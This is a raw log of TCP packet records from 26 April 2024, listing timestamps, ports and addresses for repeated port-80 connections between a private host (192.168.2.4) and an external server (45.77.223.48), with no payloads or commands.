Apr 26, 2024 04:43:13.120392084 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.120417118 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.120444059 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.133426905 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.133518934 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.133675098 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.133716106 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.133742094 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.133769989 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.147403955 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.147460938 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.147485018 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.147536039 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.160602093 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.160655022 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.259808064 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.259905100 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.266385078 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.293587923 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.293684006 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.296794891 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.296857119 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.307957888 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.308012009 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.311238050 CEST	80	49788	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.311288118 CEST	49788	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.455430984 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:13.455580950 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:13.645418882 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.381149054 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.381249905 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.381273985 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.381290913 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.381309032 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.381339073 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390116930 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390172005 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390353918 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390393972 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390399933 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390499115 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390532017 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390580893 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390885115 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390933037 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390935898 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.390974045 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.390976906 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.391019106 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.517388105 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.570991993 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.571053028 CEST	80	49789	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.571077108 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.571105957 CEST	49789	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.706096888 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.706208944 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.708231926 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:14.896722078 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:14.896835089 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.086755991 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.810297966 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.810444117 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.810482025 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.810512066 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.810610056 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.821813107 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.821947098 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822232962 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822287083 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822289944 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822344065 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822366953 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822427034 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822524071 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822575092 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822578907 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822618008 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.822629929 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.822669983 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.975709915 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.999631882 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.999753952 CEST	80	49790	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:15.999793053 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:15.999841928 CEST	49790	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:16.162162066 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:16.169147968 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:16.174844027 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:16.363085032 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:16.363396883 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:16.549803019 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.296164989 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.296226978 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.296262026 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.296394110 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.296394110 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.296394110 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.303306103 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303369045 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.303770065 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303811073 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303824902 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.303853035 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303859949 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.303903103 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.303936958 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303977966 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.303983927 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.304017067 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.304022074 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.304064035 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.438647032 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.485198975 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.485263109 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.485387087 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.485387087 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.627523899 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.627635956 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.632926941 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:17.821432114 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:17.821742058 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.011137962 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.720782995 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.720942020 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.721404076 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.721472025 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.729526997 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.729626894 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.729710102 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.729710102 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.729846954 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.729882956 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.729921103 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.729921103 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.730154037 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.730200052 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.730205059 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.730251074 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.730319977 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.730367899 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.730452061 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.730498075 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.867238045 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.909204006 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.909298897 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.909368992 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:18.909451962 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.909451962 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:18.909451962 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:19.054559946 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:19.054709911 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:19.056807995 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:19.245317936 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:19.245510101 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:19.433820009 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.159336090 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.159399986 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.159501076 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.159600019 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.167474031 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.167570114 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.167912960 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168005943 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168016911 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168045044 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168066978 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168121099 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168190956 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168232918 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168246984 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168271065 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168307066 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168311119 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.168333054 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.168364048 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.305967093 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.348507881 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.348573923 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.348599911 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.348617077 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.348670006 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.348670006 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.493192911 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.493288994 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.496254921 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.684815884 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:20.684895039 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:20.871211052 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.587587118 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.587707043 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.587744951 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.587805033 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.587898016 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.587912083 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.595545053 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.595608950 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.595608950 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.595658064 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.595786095 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.595833063 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.595873117 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.595921040 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.596366882 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.596410036 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.596419096 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.596457958 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.596520901 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.596569061 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.747915983 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.776316881 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.776576996 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.776621103 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.776671886 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.776715994 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.776715994 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.938142061 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:21.938235044 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:21.940706968 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:22.133994102 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:22.138323069 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:22.327416897 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.038809061 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.038935900 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.038957119 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.039201021 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.039252996 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.048779011 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.048830986 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.049536943 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.049578905 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.049588919 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.049628019 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.049700022 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.049736977 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.049751043 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.049777031 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.049854040 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.049899101 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.051150084 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.051198006 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.203244925 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.229015112 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.229070902 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.229074955 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.229108095 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.390297890 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.390399933 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.393349886 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.581577063 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:23.581679106 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:23.769191027 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.530702114 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.530751944 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.530803919 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.530827045 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.542562962 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.542694092 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.543848991 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.544001102 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545156956 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545207977 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545358896 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545413971 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545444965 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545501947 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545509100 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545547962 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545561075 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545587063 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.545599937 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.545634985 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.672903061 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.719784021 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.719901085 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.719930887 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.719944000 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.861593008 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:24.861789942 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:24.904349089 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:25.092564106 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:25.092916965 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:25.281320095 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:25.995968103 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:25.996140957 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:25.996352911 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:25.996354103 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.007555962 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.007646084 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.007838964 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.007888079 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.007989883 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008037090 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.008064032 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008121967 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.008256912 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008277893 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008302927 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.008318901 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.008351088 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008369923 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.008397102 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.008410931 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.139389992 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.186086893 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.186137915 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.186357975 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.327615023 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.327950001 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.329931974 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.518402100 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:26.518594027 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:26.705744028 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.416711092 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.416805983 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.417037964 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.417037964 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.417428970 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.417486906 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.425371885 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.425429106 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.425705910 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.425754070 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.425889015 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.425940990 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.426054001 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.426105022 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.426201105 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.426253080 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.426279068 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.426328897 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.426604986 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:27.426651955 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.562747002 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:27.604538918 CEST	80	49798	45.77.223.48	192.168.2.4
